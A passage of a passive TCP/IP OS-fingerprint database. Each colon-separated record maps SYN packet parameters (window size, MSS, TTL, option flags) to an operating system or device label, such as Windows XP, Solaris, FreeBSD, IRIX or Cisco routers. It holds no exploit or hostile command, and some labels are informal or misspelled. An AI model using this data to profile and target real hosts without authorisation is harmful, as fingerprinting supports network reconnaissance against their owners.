8000:0584:40:00:0:1:1:1:A:3C:HP-UX 8000:0584:40:WS:0:0:1:0:A:2C:HP-UX B.10.20 8000:05A0:40:WS:1:1:1:0:A:30:Windows 2000 8000:05AC:40:00:0:1:1:1:A:3C:FreeBSD 4.9 8000:05AC:40:00:0:1:1:1:S:LT:Mac OS X 10.1.5 8000:05AC:40:WS:0:0:0:0:A:2C:FreeBSD 8000:05AC:40:WS:0:0:1:0:A:2C:OS400 V5R2 8000:05AC:FF:WS:0:0:1:0:A:2C:Mac OS X 8000:05B4:01:WS:0:0:1:0:A:2C:HP-UX 8000:05B4:20:WS:0:0:1:0:S:2C:Windows CE 3.0 (Ipaq 3670) 8000:05B4:20:WS:0:1:1:0:S:2C:Windows CE 3.0 (Ipaq 3670) 8000:05B4:40:00:0:0:1:0:S:2C:HP-UX B.10.01 A 9000/712 8000:05B4:40:00:0:1:0:0:A:LT:NetBSD 8000:05B4:40:00:0:1:0:0:S:LT:OpenVMS 8000:05B4:40:00:0:1:0:1:A:3C:HP-UX B.11.00 8000:05B4:40:00:0:1:0:1:S:3C:NetBSD 8000:05B4:40:00:0:1:1:0:A:LT:HP-UX 8000:05B4:40:00:0:1:1:0:S:30:Digital UNIX V4.0E, Mac OS X 8000:05B4:40:00:0:1:1:1:A:3C:Windows 8000:05B4:40:00:0:1:1:1:S:3C:Mac OS X 10.1.[23] 8000:05B4:40:00:1:1:1:1:S:40:OpenBSD 3.1 8000:05B4:40:WS:0:0:0:0:A:2C:FreeBSD 8000:05B4:40:WS:0:0:0:0:S:2C:AIX 8000:05B4:40:WS:0:0:1:0:A:2C:Mac OS X Darwin 1.4 / HP-UX 10.20 8000:05B4:40:WS:0:0:1:0:S:2C:Mac OS X 8000:05B4:40:WS:1:1:1:0:A:30:Windows 2000 8000:05B4:80:00:0:1:1:0:S:30:Dec V4.0 OSF1 8000:05B4:80:00:1:1:1:0:A:34:Windows XP Pro 8000:05B4:80:WS:0:0:1:0:S:LT:Novell NetWare 4.11 8000:05B4:80:WS:1:1:1:0:A:30:Windows CE .NET 8000:05B4:80:WS:1:1:1:0:S:30:Windows XP 8000:05B4:FF:00:0:1:0:0:S:30:MAC OS 8.6 8000:05B4:FF:00:0:1:1:0:S:30:Mac OS 9 8000:05B4:FF:00:0:1:1:1:A:3C:Mac OS 8000:05B4:FF:WS:0:0:1:0:A:LT:OpenBSD 8000:05B4:FF:WS:1:1:1:0:A:30:Wire Home Portal DSL Routerw/nat 8000:1000:40:WS:0:0:1:0:A:2C:HP-UX 8000:114C:40:WS:0:0:0:0:A:2C:IBM MVS 8000:6405:FF:00:0:1:1:1:A:3C:Mac OS 9.2.2 8000:6405:FF:WS:0:0:1:0:A:2C:Mac OS 9.2.2 8000:9405:FF:00:0:1:1:1:A:3C:Mac Os 9.1 8000:B405:40:00:0:1:1:1:S:3C:Mac OS X 10.x (Darwin 1.3.x 1.4.x 5.x) 8000:B405:40:00:0:1:1:1:S:LT:Mac OS X 10.x.x - Darwin 6.1 8000:B405:40:00:0:1:1:1:S:LT:Mac Ox X 10.2.8 Jaguar 8000:B405:40:WS:0:0:1:0:S:2C:MacOS X 8000:B405:40:WS:0:0:1:0:S:LT:Mac Os X 8000:B405:80:00:1:1:1:1:S:40:Windows CE 3.0 8000:B405:80:WS:1:1:1:0:S:LT:Pocket PC 8000:B405:FF:00:0:1:0:0:S:LT:Mac OS 9.1 8000:B405:FF:00:0:1:1:0:A:30:Mac OS 9.1 8000:B405:FF:00:0:1:1:0:S:30:Mac OS 9.2 8000:B405:FF:00:0:1:1:1:A:3C:Mac OS 9.1 8000:_MSS:80:00:0:0:1:0:A:LT:Novell NetWare 3.12 - 5.00 8000:_MSS:80:00:0:1:0:0:A:LT:Cray UNICOS 9.0.1ai - 10.0.0.2 8000:_MSS:80:00:0:1:0:1:A:LT:Cray UNICOS 9.0.1ai - 10.0.0.2 8000:_MSS:80:00:0:1:1:0:A:LT:Apple MacOS 9.04 (Powermac or G4) 8000:_MSS:80:00:0:1:1:1:A:LT:Apple MacOS 9.04 (Powermac or G4) 8000:_MSS:80:WS:0:0:0:0:A:LT:DECNIS 600 V4.1.3B System 8000:_MSS:80:WS:0:0:1:0:A:LT:Cisco IOS 12.0(3.3)S (perhaps a 7200) 804C:A005:40:00:0:1:1:1:A:3C:Mac OS X 8052:05B4:40:01:1:1:1:1:S:40:Solaris 5.8 805C:_MSS:80:00:0:1:0:0:A:LT:BSDI BSD/OS 2.0 - 2.1 805C:_MSS:80:00:0:1:0:1:A:LT:BSDI BSD/OS 2.0 - 2.1 805C:_MSS:80:00:0:1:1:0:A:LT:Compaq Tru64 UNIX (formerly Digital UNIX) 4.0e 807A:_MSS:80:00:0:1:0:0:A:LT:OpenBSD 2.6-2.8 807A:_MSS:80:00:0:1:0:1:A:LT:OpenBSD 2.6-2.8 807A:_MSS:80:00:0:1:1:0:A:LT:AmigaOS 3.1 running Miami Deluxe 0.9m 807A:_MSS:80:00:0:1:1:1:A:LT:AmigaOS 3.1 running Miami Deluxe 0.9m 8084:0584:40:01:1:1:1:1:A:40:SunOS 5.8 / Solaris 8 8160:0564:40:01:1:1:1:0:A:34:Solaris 8 8160:05B4:40:01:0:1:1:1:A:3C:Solaris 8 - X86 81D0:0218:40:00:0:1:0:0:A:LT:OSF1 4.0 81D0:_MSS:40:WS:0:0:1:0:A:LT:Compaq Tru64 UNIX 5.0 8218:05B4:40:00:0:1:1:1:A:3C:Mac OS X 10.1.5 8218:05B4:40:00:1:1:1:1:A:40:Solaris 8218:05B4:40:01:1:1:1:0:A:LT:Solaris 8 8218:05B4:40:01:1:1:1:1:A:40:Gauntlet Firewall 8218:B405:40:00:0:1:0:1:A:3C:MAC OS X 10.3.4 8218:B405:40:00:0:1:1:1:A:3C:Mac OS X 10.1.4 8218:B405:40:00:0:1:1:1:A:LT:Mac OS X 8218:B405:40:00:0:1:1:1:A:LT:MacOS X Server Release 8235:0488:FF:WS:0:0:0:0:S:2C:Mac OS X 8246:AA05:40:00:0:1:0:1:A:3C:X server 8274:05AC:40:WS:0:0:1:0:A:2C:Digital Unix 4.0b 8274:05B4:40:WS:0:0:0:0:A:2C:Digital Unix 4.0b 832C:05B4:40:00:0:1:1:0:A:30:Compaq Tru64 UNIX 5.0 / Digital UNIX V5.60 832C:05B4:40:WS:0:0:0:0:A:2C:Digital Unix 832C:05B4:40:WS:0:0:1:0:A:2C:Freebsd 4.3 832C:05B4:40:WS:1:1:1:0:A:30:Windows 2000 pro 832C:05B4:40:WS:1:1:1:0:S:30:Solaris 8 832C:05B4:FF:00:1:1:0:0:A:34:Windows 2000 Server 832C:05B4:FF:WS:0:0:1:0:S:2C:Solaris 7 832C:05B4:FF:WS:1:1:0:0:A:30:MAC OS X 832C:10D8:40:00:0:1:0:0:A:30:Unix 832C:B405:40:00:0:1:1:0:A:30:Digital UNIX V4.0F 832C:B405:40:WS:0:0:1:0:A:2C:Mac OS X 10.1 832C:B405:40:WS:0:0:1:0:A:LT:Darwin 832C:B405:FF:00:0:1:1:0:A:LT:Mac OS X 832C:_MSS:40:WS:0:0:1:0:A:LT:Linux 2.0.34 - 2.0.38 8340:0578:40:WS:1:1:1:0:A:30:Solaris 8 8340:0584:40:00:0:1:1:1:A:3C:Mac OS X/10 8340:05B4:40:00:0:1:1:1:A:3C:MacOS X 8371:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 8371:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 8377:_MSS:80:00:0:0:1:0:A:LT:Solaris 2.5, 2.5.1 8400:8C05:40:00:0:1:1:1:A:3C:MacOS X 10.3 8520:B405:40:WS:0:0:1:0:A:LT:MacOS X 10.2.1 869F:_MSS:80:00:0:1:1:0:A:LT:Windows NT4 / Win95 / Win98 869F:_MSS:80:00:0:1:1:1:A:LT:Windows NT4 / Win95 / Win98 8700:05AC:FF:00:1:1:1:1:A:40:Solaris 2.6 8765:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 with tcp_strong_iss=0 8765:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 with tcp_strong_iss=0 879B:_MSS:80:WS:0:0:1:0:A:LT:Solaris 2.5, 2.5.1 87C0:05B4:FF:00:1:1:0:1:A:40:Windows 87C0:05B4:FF:00:1:1:1:1:A:40:Solaris 2.6 2.7 87C0:_MSS:FF:WS:0:0:1:0:A:LT:Solaris 2.6 - 2.7 88E0:05B4:80:WS:1:1:1:0:S:30:Windows 2000 8EDA:_MSS:80:00:0:0:1:0:A:LT:Solaris 2.5, 2.5.1 8F4D:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 8F4D:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 91B4:05AC:40:00:1:1:1:0:A:34:Windows NT 5.1 (Windows XP) 91B4:05B4:40:00:1:1:1:0:S:34:Windows XP 94C0:05B4:80:WS:1:1:1:0:S:30:Windows 2000 95C2:B405:80:WS:1:1:1:0:S:30:Windows ME 9820:05B4:40:WS:1:1:1:0:S:30:Windows 2000 9C40:05B4:80:WS:1:1:1:0:S:30:Windows Xp AA3C:05B4:80:WS:1:1:1:0:S:30:Windows 2000 Pro ABB0:059E:80:WS:1:1:1:0:A:30:Windows XP ABCD:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 ABCD:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 AC00:0550:80:WS:0:0:1:0:S:2C:Windows NT 4.0 SP6a AC00:05AC:80:WS:1:1:1:0:S:30:Windows 2000 SP2 AC00:FA3B:80:WS:1:1:1:0:S:LT:Windows 2000 SP2 AE4C:0594:80:WS:1:1:1:0:S:30:OpenBSD 3.5 AE4C:05B4:40:03:1:1:1:1:S:40:Windows XP AE4C:05B4:40:WS:0:0:0:0:S:2C:Windows 95 AE4C:05B4:80:03:1:1:1:0:S:34:Windows 2000 AE60:0586:80:WS:1:1:1:0:S:30:Windows ME AE60:05B4:80:03:1:1:1:1:S:40:Linux AE60:05B4:80:WS:1:1:1:0:S:30:Windows XP B270:05B4:80:WS:1:1:1:0:S:LT:Windows ME B400:05AC:20:03:1:1:1:1:S:40:windows 200 B400:05B4:20:03:1:1:0:1:S:LT:Windows 2000 SP2 B400:05B4:20:03:1:1:1:1:S:40:Windows 2000 B400:05B4:40:03:1:1:1:0:S:34:Windows XP SP2 B400:05B4:40:03:1:1:1:1:S:40:Windows XP Pro SP1 B400:05B4:80:03:1:1:1:1:S:40:Windows XP B400:B405:20:03:1:1:1:0:S:34:Windows 2000 SP3 B580:05AC:40:02:1:1:1:1:A:40:Windows XP B580:05AC:80:03:1:1:1:1:A:40:Windows XP B580:05B4:80:03:1:1:1:1:A:40:Windows XP B5A4:05B4:80:00:1:1:0:1:A:40:Linux 2.4.18 B5A4:05B4:80:00:1:1:1:0:S:34:Windows 2000 Server B5A4:05B4:80:00:1:1:1:1:A:40:Windows XP Corp. SP1 (Ger) B5A4:05B4:80:WS:0:0:0:0:A:2C:Windows XP Corp. SP1 (Ger) B5A4:05B4:80:WS:1:1:1:0:S:30:Windows XP SP2 german B5C9:_MSS:80:00:0:1:1:0:A:LT:Windows Millenium Edition v4.90.3000 B5C9:_MSS:80:00:0:1:1:1:A:LT:Windows Millenium Edition v4.90.3000 B680:05B4:FF:WS:0:0:0:0:A:2C:ZyXEL ZyNOS 3.50 B9F0:0578:FF:WS:0:0:0:0:A:2C:Windows 2000 BB80:05B4:80:WS:1:1:1:0:S:30:Windows 2000 BB80:_MSS:80:WS:0:0:1:0:A:LT:Windows 98 C000:057A:40:WS:1:1:1:0:A:30:Linux C000:05A0:80:00:1:1:1:1:S:40:Windows XP C000:05B4:40:00:0:0:0:0:S:2C:IRIX 6.5 / 6.4 C000:05B4:40:00:1:1:1:1:A:40:IRIX64 6.5 IP27 C000:05B4:40:WS:0:0:0:0:S:LT:Irix 6.5 C000:05B4:40:WS:1:1:1:0:A:30:Linux C000:05B4:80:00:0:1:0:0:A:LT:IRIX 6.2 - 6.5 C000:05B4:80:00:0:1:0:1:A:LT:IRIX 6.2 - 6.5 C000:_MSS:80:WS:0:0:0:0:A:LT:OS-9/68K V2.4 (Quanterra Q4124 - 68030) C050:05B4:40:00:0:1:1:1:A:3C:Solaris 9 SPARC ULTRA 10 C050:05B4:40:00:1:1:1:1:A:40:SunOS 5.9 (sun4u) C08A:_MSS:80:00:0:1:1:0:A:LT:FreeBSD 2.2.1 - 4.1 C08A:_MSS:80:00:0:1:1:1:A:LT:FreeBSD 2.2.1 - 4.1 C0B7:_MSS:80:00:0:1:1:0:A:LT:FreeBSD 2.2.1 - 4.1 C0B7:_MSS:80:00:0:1:1:1:A:LT:FreeBSD 2.2.1 - 4.1 C0D8:05AC:40:WS:1:1:1:0:A:30:Solaris 9 C1E8:05B4:40:WS:0:0:1:0:A:2C:Solaris 9 C1E8:05B4:40:WS:1:1:1:0:A:30:Windows NT C1E8:05B4:40:WS:1:1:1:0:S:30:Solaris 9 C210:0564:40:WS:1:1:1:0:A:30:Linux C377:05AC:80:02:1:1:1:1:S:40:Windows 2000 advanced server SP2 C3C8:0598:40:WS:1:1:1:0:A:30:Unix C79C:05B4:80:WS:1:1:1:0:S:30:Windows XP Home CDFF:_MSS:80:00:0:0:1:0:A:LT:SONY NEWS-OS 6.1.2 D600:05AC:80:02:1:1:1:1:S:40:Windows XP Professional D780:05B4:40:03:1:1:1:0:S:34:Winblows XP D780:B405:40:03:1:1:1:0:S:LT:Windows XP DA00:05B4:80:02:1:1:0:0:S:34:Windows 2000 DA00:05B4:80:02:1:1:1:0:S:34:Windows XP E000:0564:40:00:0:1:0:1:A:3C:FreeBSD 4.8 E000:0564:40:00:0:1:1:1:A:3C:BSD E000:0564:40:WS:0:0:1:0:A:2C:Free BSD 4.7 E000:0578:40:00:0:1:1:1:A:3C:FreeBSD 4.9-stable E000:0578:40:WS:0:0:1:0:A:2C:FreeBSD E000:0584:40:00:0:1:1:1:A:3C:Linux/FreeBSD E000:0586:40:WS:0:0:0:0:A:2C:FreeBSD4.6.2 E000:05A0:40:00:0:1:1:1:A:3C:FreeBSD 4.7-RELEASE / 4.9 E000:05AA:40:WS:0:0:1:0:A:2C:Windows2000 E000:05AC:40:00:0:1:1:1:A:3C:free BSD E000:05AC:40:WS:0:0:1:0:A:2C:FreeBSD 4.7 E000:05B4:40:00:0:1:0:1:A:3C:FreeBSD 4.6-RELEASE-p1 E000:05B4:40:00:0:1:1:0:A:30:Free BSD 4.8-STABLE E000:05B4:40:00:0:1:1:1:A:3C:FreeBSD 4.7-PRERELEASE E000:05B4:40:00:0:1:1:1:S:3C:FreeBSD 4.6-RELEASE E000:05B4:40:00:0:1:1:1:S:LT:Free BSD 4.7-Stable E000:05B4:40:WS:0:0:0:0:A:2C:FreeBSD 4.6-RELEASE-p1 E000:05B4:40:WS:0:0:1:0:A:2C:FreeBSD 4.7 E000:05B4:40:WS:0:0:1:0:S:2C:FreeBSD E000:05B4:80:00:0:1:1:1:S:3C:FreeBSD 4.6-RC2 E000:6405:40:00:0:1:0:1:A:3C:FreeBSD 4.6 E000:B405:40:00:0:1:0:1:A:3C:FreeBSD 4.6 E000:B405:40:00:0:1:1:1:A:3C:Free BSD 4.8 E000:B405:40:00:0:1:1:1:S:3C:Free BSD E000:B405:40:00:0:1:1:1:S:LT:Free BSD E000:C003:40:00:0:1:1:1:A:3C:Linux Debian E640:05AC:40:02:1:1:1:0:S:34:Windows 2000 Server - Windows XP SP1 E640:05B4:40:02:1:1:0:0:S:LT:Windows 2000 SP2 E640:05B4:40:02:1:1:1:0:S:34:Windows 2000 Professional E8C0:05A0:40:01:1:1:1:0:S:34:Windows 98 E920:_MSS:80:00:0:1:1:1:A:LT:Windows ME EA60:05AC:40:WS:0:0:1:0:A:2C:Router Cisco 677 EA60:05DC:40:WS:0:0:1:0:A:2C:Windows XP EA60:05DC:40:WS:0:0:1:0:A:LT:Cisco 667i-DIR DSL router -- cbos 2.4.2 EA60:_MSS:80:WS:0:0:1:0:A:LT:Cisco 675 DSL router -- cbos 2.1 EB28:0578:40:WS:1:1:1:0:A:30:IRIX 6.5.x EBC0:0218:80:02:1:1:0:1:S:40:Windows XP EBC0:05AC:40:02:0:1:0:0:S:30:Windows 2000 EBC0:05AC:40:02:1:1:1:0:S:34:Windows XP EBC0:05B4:40:02:1:1:0:0:S:LT:Windows ME EBC0:05B4:40:02:1:1:1:0:S:34:Windows 2000 Pro SP2 / XP Pro EBC0:05B4:40:02:1:1:1:1:S:40:Windows XP EBC0:05B4:40:WS:1:1:1:0:S:30:Windown XP EBC0:05B4:80:02:1:1:1:0:S:34:Windows XP EBC0:05B4:80:02:1:1:1:1:S:40:Windows XP EBC0:05B4:80:WS:1:1:1:0:S:30:Windows ME ED90:05B4:40:00:0:1:1:1:A:3C:Irix 6.5.8 ED90:05B4:40:00:1:1:1:1:A:40:IRIX 6.5 ED90:_MSS:40:WS:0:0:1:0:A:LT:IRIX 6.2 - 6.5 EE48:_MSS:40:WS:0:0:1:0:A:LT:IRIX 5.1 - 5.3 EF2A:_MSS:80:00:0:1:0:0:A:LT:IRIX 5.2 EF2A:_MSS:80:00:0:1:0:1:A:LT:IRIX 5.2 EF88:_MSS:40:WS:0:0:1:0:A:LT:IRIX 6.2 - 6.5 F000:0200:40:WS:0:0:0:0:S:LT:IRIX 5.3 / 4.0.5F F000:05B4:40:00:0:1:0:0:A:30:OSF1 5.1 732 alpha F000:05B4:40:00:0:1:0:0:S:30:OSF1 5.1 F000:05B4:40:WS:0:0:0:0:A:2C:OSF1 F000:05B4:40:WS:0:0:0:0:S:LT:IRIX 6.3 F000:05B4:40:WS:1:1:0:0:S:LT:IRIX 6.5.10 F000:05B4:80:00:0:1:0:0:A:LT:IRIX 5.3 F000:05B4:80:00:0:1:0:0:S:30:DEC Cluster F000:05B4:80:00:0:1:0:1:A:LT:IRIX 5.3 F000:B405:40:WS:1:1:0:0:S:30:SGI Irix 6.5.17m F400:05B4:80:01:1:1:1:0:S:34:Windows XP F424:05B4:80:04:1:1:1:0:A:34:Windows XP SP1 - english F5E0:05B4:80:01:1:1:1:0:S:34:Windows 2000 F990:05B4:40:WS:1:1:1:0:S:30:Windows 2000 F99F:0000:80:WS:0:0:0:0:S:28:Linux 2.2.x or 2.4.x FA00:05B4:40:01:0:1:1:1:A:3C:Windows FAD8:0574:80:WS:1:1:1:0:S:30:Windows XP FAF0:0200:80:WS:1:1:1:0:S:30:Windows 2000 FAF0:04EC:80:WS:1:1:1:0:S:30:Windows XP Professional FAF0:0514:80:WS:1:1:1:0:S:30:Windows XP FAF0:0518:80:WS:1:1:1:0:S:30:Windows 2000 server FAF0:0528:80:WS:1:1:1:0:S:30:Windows FAF0:0550:80:WS:1:1:1:0:A:30:Windows XP Pro FAF0:055C:80:WS:1:1:1:0:S:30:Windows XP SP2 FAF0:0564:80:00:1:1:1:1:A:40:Windows XP FAF0:0564:80:WS:0:0:1:0:A:2C:Windows XP Professional FAF0:0564:80:WS:1:1:1:0:A:30:Windows 2K FAF0:0564:80:WS:1:1:1:0:S:30:Windows XP Professional FAF0:0572:80:WS:1:1:1:0:S:30:Windows XP FAF0:0578:80:WS:1:1:1:0:A:30:Windows XP FAF0:0578:80:WS:1:1:1:0:S:30:Windows 2000 FAF0:057A:80:WS:1:1:1:0:S:30:Windows XP FAF0:0584:40:WS:1:1:1:0:A:30:Unix FAF0:0584:80:WS:0:1:1:0:S:30:Windows XP FAF0:0584:80:WS:1:1:1:0:A:30:Windows 2000 / XP FAF0:0584:80:WS:1:1:1:0:S:30:Windows XP FAF0:0586:80:WS:1:1:1:0:S:30:Windows XP pro FAF0:0598:80:WS:1:1:1:0:A:30:Windows XP FAF0:05A0:40:00:1:1:1:0:S:34:Linux FAF0:05A0:80:00:1:1:1:1:A:40:Windows XP FAF0:05AC:40:03:1:1:1:0:A:34:Windows 2000 FAF0:05AC:80:00:1:1:1:1:A:40:Windows XP FAF0:05AC:80:WS:1:1:1:0:A:30:Windows 2000 FAF0:05AC:80:WS:1:1:1:0:S:30:Windows 2000 Pro FAF0:05B0:80:WS:1:1:1:0:A:30:Windows 2000 FAF0:05B4:40:00:1:1:1:0:S:34:Windows XP FAF0:05B4:40:00:1:1:1:0:S:LT:Windows 98 FAF0:05B4:40:00:1:1:1:1:A:40:Windows 2000 FAF0:05B4:40:00:1:1:1:1:S:40:Windows 2000 FAF0:05B4:40:02:1:1:0:0:A:LT:Windows ME FAF0:05B4:40:02:1:1:1:0:A:34:Windows 2000 FAF0:05B4:40:WS:0:0:0:0:A:2C:IBM AIX (JG) FAF0:05B4:40:WS:0:0:1:0:A:2C:SunOS 5.9 FAF0:05B4:40:WS:0:0:1:0:S:2C:Windows NT Server 4.0 FAF0:05B4:40:WS:1:1:1:0:A:30:Unix FAF0:05B4:40:WS:1:1:1:0:S:30:Windows XP Professional, Build 2600 FAF0:05B4:80:00:0:1:1:0:A:LT:Windows 2000 Professional, Build 2183 (RC3) FAF0:05B4:80:00:0:1:1:1:A:3C:Windows 2000 Professional / Windows XP Pro FAF0:05B4:80:00:1:1:1:0:A:34:Windows XP FAF0:05B4:80:00:1:1:1:0:S:34:Windows 2000 FAF0:05B4:80:00:1:1:1:1:A:40:Windows 2000 Version 5.0 (Build 2195) FAF0:05B4:80:00:1:1:1:1:S:40:Windows XP FAF0:05B4:80:WS:0:0:0:0:A:2C:Windows NT 4.0 FAF0:05B4:80:WS:0:0:0:0:S:2C:Windows XP Proffesional Release FAF0:05B4:80:WS:0:0:1:0:A:2C:Linux Slackware 8.0 FAF0:05B4:80:WS:0:0:1:0:S:2C:Windows XP SP2 FAF0:05B4:80:WS:0:1:1:0:A:LT:Windows XP Professional Release FAF0:05B4:80:WS:0:1:1:0:S:30:Windows XP FAF0:05B4:80:WS:1:1:0:0:A:30:Linux FAF0:05B4:80:WS:1:1:0:0:S:30:Windows 2000 Pro FAF0:05B4:80:WS:1:1:1:0:A:30:Windows XP FAF0:05B4:80:WS:1:1:1:0:A:34:Windows XP Pro FAF0:05B4:80:WS:1:1:1:0:S:30:Windows XP Pro, Windows 2000 Pro FAF0:05B4:80:WS:1:1:1:0:S:LT:Windows 98 SE / 2000 / XP Professional FAF0:05B4:80:WS:1:1:1:0:S:LT:Windows XP FAF0:05B4:FF:WS:0:0:1:0:S:2C:Linux 2.1.xx FAF0:05B4:FF:WS:1:1:1:0:A:LT:Windows 2000 Pro FAF0:05B4:FF:WS:1:1:1:0:S:30:Windows 2000 Professional SP 3 FAF0:B405:40:00:0:1:1:0:A:LT:Mac OS X Server 10.1 FAF0:B405:80:00:0:1:1:1:A:3C:Windows XP professional FAF0:B405:80:00:0:1:1:1:A:LT:Windows XP FAF0:B405:80:00:1:1:1:1:A:LT:Pocket Pc 2002 FAF0:B405:80:WS:0:0:1:0:A:2C:Windows XP Pro FAF0:B405:80:WS:1:1:1:0:A:30:Windows XP FAF0:B405:80:WS:1:1:1:0:S:30:Windows XP Home FAF0:_MSS:FF:WS:0:0:0:0:A:LT:Solaris 2.6 - 2.7 FB04:0594:80:WS:1:1:1:0:S:30:Windows XP FB40:0218:40:00:1:1:1:0:S:34:Windows 2000 Pro FB40:05B4:40:00:1:1:1:0:S:34:Windows XP FC00:04EC:80:WS:1:1:1:0:S:30:Windows XP FC00:0518:40:WS:0:0:0:0:A:2C:Xbox - Avalaunch 0.48.64 FC00:0546:80:WS:1:1:1:0:S:30:Windows XP Pro FC00:0564:80:WS:1:1:1:0:A:30:Cisco PIX FireWall FC00:0578:40:WS:0:0:0:0:S:2C:Microsoft XBox FC00:057E:80:WS:1:1:1:0:S:30:Windows XP FC00:05B4:80:00:0:1:1:1:A:3C:Windows 2000 FC00:05B4:80:00:1:1:0:1:A:40:Windows 2000 Running IIS Version 5 FC00:05B4:80:00:1:1:1:0:S:34:Windows XP SP1 FC00:05B4:80:00:1:1:1:1:A:40:Windows 2000 - XP FC00:05B4:80:WS:0:0:1:0:A:2C:Windows XP FC00:05B4:80:WS:1:1:1:0:A:30:Windows X FC00:05B4:80:WS:1:1:1:0:S:30:Windows 2000 Pro FC00:7E05:80:WS:1:1:1:0:S:30:Windows XP Pro FC00:B405:80:00:0:1:1:1:A:3C:Windows 2000 server FC00:B405:80:00:1:1:1:0:A:34:Windows XP Professional v2002 SP1 FC00:B405:80:WS:1:1:1:0:S:30:Windows XP FC6C:05B4:80:WS:1:1:1:0:S:LT:Windows XP FCA4:057E:80:WS:1:1:1:0:S:30:Windows XP FD20:05A0:80:00:1:1:1:1:A:40:Windows XP Home v2002 FD20:05A0:80:WS:1:1:1:0:A:30:Windows XP home FD20:05A0:80:WS:1:1:1:0:S:30:Windows XP Home v2002 FDB8:0584:FF:WS:1:1:1:0:S:30:Windows XP FDD4:05A4:80:WS:1:1:1:0:S:30:Windows XP SP1 FE70:0588:80:WS:1:1:0:0:A:30:Windows 98 SE FE70:0588:80:WS:1:1:0:0:S:30:Windows XP Home FE88:05B4:FF:00:0:1:1:1:A:3C:Solaris FE88:05B4:FF:00:1:1:1:1:A:40:Mac OS X Server FE88:B405:40:00:0:1:1:1:A:3C:Mac OS X Server 10.x FE88:_MSS:FF:WS:0:0:1:0:A:LT:Solaris 2.6 - 2.7 FEF4:0534:80:00:1:1:1:1:A:40:Windows 2000 FEF4:0534:80:WS:1:1:1:0:S:30:Windows XP FEFA:_MSS:80:00:0:1:0:0:A:LT:AIX v4.2 FEFA:_MSS:80:00:0:1:0:1:A:LT:AIX v4.2 FF00:0550:80:00:1:1:1:1:A:40:Windows XP FF00:0550:80:WS:1:1:1:0:S:30:Windows XP FF3C:0584:80:WS:1:1:1:0:A:30:Windows 2000 FF3C:05AC:40:WS:1:1:1:0:A:30:Windows XP FF3C:05AC:80:00:1:1:1:0:A:34:Windows XP Pro FF3C:05AC:80:WS:1:1:0:0:S:30:Windows 2000 Pro SP3 FF3C:05AC:80:WS:1:1:1:0:S:30:Windows 2000 FF70:0218:80:WS:1:1:1:0:A:30:Windows 2000 Professional FF70:0218:80:WS:1:1:1:0:S:1C:Windows XP Professional Build 2600.xpsp2.030422 FFA3:05B4:40:WS:1:1:1:0:S:30:Windown 2000 FFAF:_MSS:80:00:0:0:1:0:A:LT:Solaris 2.3 - 2.4 FFAF:_MSS:80:00:0:1:0:0:A:LT:Hitachi HI-UX/MPP (don't know version) FFAF:_MSS:80:00:0:1:0:1:A:LT:Hitachi HI-UX/MPP (don't know version) FFAF:_MSS:80:WS:0:0:0:0:A:LT:AIX 3.2.5 (Bull HardWare) FFDC:0200:40:00:0:1:0:1:A:3C:Windows XP FFF0:04EC:80:00:1:1:1:0:A:34:Windos XP FFF0:04EC:80:00:1:1:1:1:A:40:Windows 2000 FFF0:04EC:80:WS:1:1:1:0:S:30:Windows 2000 FFF0:057A:80:00:1:1:1:1:A:40:Windows XP FFF0:05B0:80:WS:1:1:1:0:A:30:Windows XP FFF0:05B0:80:WS:1:1:1:0:S:30:Windows XP FFF0:B005:80:00:0:1:1:1:A:3C:Windows XP FFF0:EC04:80:WS:1:1:1:0:S:30:Windows XP FFF7:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 FFF7:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 FFFF:0200:40:01:0:1:0:0:A:30:FreeBSD 4.8 FFFF:0200:40:WS:0:0:0:0:A:2C:AIX FFFF:0200:80:WS:1:1:1:0:S:30:Windows FFFF:0218:80:00:1:1:1:0:S:34:Windows XP FFFF:024C:80:WS:1:1:1:0:S:30:Windows XP sp2 FFFF:04EC:40:00:1:1:1:1:S:40:Windows XP FFFF:04EC:80:00:1:1:1:1:A:40:Windows 2000 FFFF:04EC:80:WS:0:0:1:0:A:2C:Windows 2000 FFFF:04EC:80:WS:1:1:1:0:S:30:Windows 2000 Professional FFFF:052A:40:WS:0:0:0:0:A:2C:Windows* [aol client] FFFF:052A:80:00:1:1:0:1:A:40:Windows 2000 Server FFFF:0534:40:WS:1:1:1:0:A:30:Windows XP Pro SP1 FFFF:0548:80:WS:1:1:0:0:S:30:Windows 2000 Server FFFF:0550:40:WS:1:1:1:0:A:30:Windows 2000 Server FFFF:0558:80:WS:0:0:1:0:S:LT:BorderManager 3.5 FFFF:055C:80:WS:1:1:0:0:S:30:Windows XP FFFF:0564:40:00:0:1:1:1:A:3C:FreeBSD FFFF:0564:40:01:0:1:1:1:S:3C:FreeBSD 5.1-RELEASE FFFF:0564:40:WS:0:0:0:0:A:LT:AIX FFFF:0564:40:WS:0:0:1:0:A:2C:Linux FFFF:0564:40:WS:1:1:1:0:S:30:Windows 98 Second Edition FFFF:0564:80:00:1:1:1:1:A:40:Windows 2000 server FFFF:0564:80:WS:0:0:1:0:A:2C:BSD FFFF:0564:80:WS:1:1:1:0:A:30:Windows 2000 / NT FFFF:0564:80:WS:1:1:1:0:S:30:Windows FFFF:0564:80:WS:1:1:1:1:A:3C:Windows 2000 FFFF:0578:40:WS:0:0:1:0:S:2C:FreeBSD 4.5 FFFF:0578:80:WS:1:1:1:0:S:30:Windows XP FFFF:057E:80:00:1:1:1:1:S:40:Windows 2000 FFFF:057E:80:WS:1:1:0:0:S:30:Windows 2000 Professional FFFF:0580:80:00:1:1:1:0:A:34:Watchguard Firebox FFFF:0584:40:00:1:1:1:1:A:40:Windows XP FFFF:0584:40:WS:0:0:0:0:A:2C:Solaris FFFF:0584:40:WS:0:0:1:0:A:2C:Linux FFFF:0584:80:WS:1:1:1:0:A:30:Cisco-louche1 FFFF:0584:80:WS:1:1:1:0:S:30:Linux Debian FFFF:0586:40:00:0:1:1:1:A:3C:Unix 